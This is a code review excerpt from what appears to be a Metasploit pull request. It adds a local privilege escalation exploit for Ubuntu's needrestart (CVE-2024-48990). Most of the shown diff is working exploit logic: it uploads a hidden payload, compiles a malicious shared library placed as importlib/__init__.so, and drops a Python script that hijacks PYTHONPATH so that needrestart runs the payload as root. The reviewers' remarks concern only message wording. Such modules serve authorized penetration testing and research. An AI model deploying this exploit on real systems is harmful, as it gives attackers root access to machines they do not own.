modules/exploits/linux/local/ubuntu_needrestart_lpe.rb

```diff
@@ -0,0 +1,174 @@
+    # package = package.gsub('needrestart-', '') # fedora specific
+    package = Rex::Version.new(package)
+    return CheckCode::Safe('needrestart not install, or not detected.') if package == Rex::Version.new('0') # aka empty/nil
+
+    return CheckCode::Appears("Vulnerable needrestart version #{package} detected on Ubuntu #{version}") if package < fixed_versions[version]
+
+    CheckCode::Safe("needrestart is not vulnerable on Ubuntu #{version}")
+  end
+
+  def exploit
+    # Check if we're already root
+    if !datastore['ForceExploit'] && is_root?
+      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
+    end
+
+    # Make sure we can write our exploit and payload to the local system
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    # upload payload
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    upload_and_chmodx payload_path, generate_payload_exe
+    vprint_status("Uploading payload: #{payload_path}")
+    register_files_for_cleanup(payload_path)
+
+    # our c stub file does our chmod/chown/suid for the payload
+    c_stub = strip_comments(exploit_data('CVE-2024-48990', 'lib.metasm'))
+    c_stub = c_stub.gsub('PAYLOAD_PATH', payload_path)
+
+    case kernel_arch
+    when ARCH_X86
+      cpu = Metasm::Ia32.new
+    when ARCH_X64
+      cpu = Metasm::X86_64.new
+    else
+      fail_with Failure::NoTarget, 'Target is not compatible'
+    end
+
+    begin
+      c_stub = Metasm::ELF.compile_c(cpu, c_stub).encode_string(:lib)
+      c_stub_path = "#{base_dir}/importlib/__init__.so"
+    rescue StandardError
+      print_error "Metasm encoding failed: #{$ERROR_INFO}"
+      elog "Metasm encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}"
+      elog "Call stack:\n#{$ERROR_INFO.backtrace.join "\n"}"
+      fail_with Failure::Unknown, 'Metasm encoding failed'
+    end
+
+    mkdir "#{base_dir}/importlib"
+    write_file(c_stub_path, c_stub)
+    vprint_status("Uploading c_stub: #{c_stub_path}")
+    register_files_for_cleanup(c_stub_path)
+    register_dir_for_cleanup("#{base_dir}/importlib")
+
+    # the python script is needed for having the PYTHONPATH set and watches
+    # for our payload to be modified, then run it
+    py_script = strip_comments(exploit_data('CVE-2024-48990', 'sleeper.py'))
+    py_script = py_script.gsub('PAYLOAD_PATH', payload_path)
+
+    py_stub_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    write_file py_stub_path, py_script
+    vprint_status("Uploading py_script: #{py_stub_path}")
+    register_files_for_cleanup(py_stub_path)
+
+    # Launch exploit with a timeout.  We also have a vprint_status so if the user wants all the
+    # output from the exploit being run, they can optionally see it
+    timeout = 90_000 # 25 hours
+    print_status 'Launching exploit, and waiting for needrestart to run...'
```

Comment:
Being more explicit never hurts 
```suggestion
    print_status 'Launching exploit, and waiting for "sudo needrestart" to be run on the target host...'
```

Reply:
This seems to imply the user will run it, which seems unlikely outside of a testing environment. It's significantly more likely that `apt-get upgrade` is run (by user or system). So while it could be added, it seems unnecessary IMO since the user likely won't be running it directly

Reply:
Yup that makes sense. This suggestion definitely came from a testing environment perspective, leaving it out sounds good to me.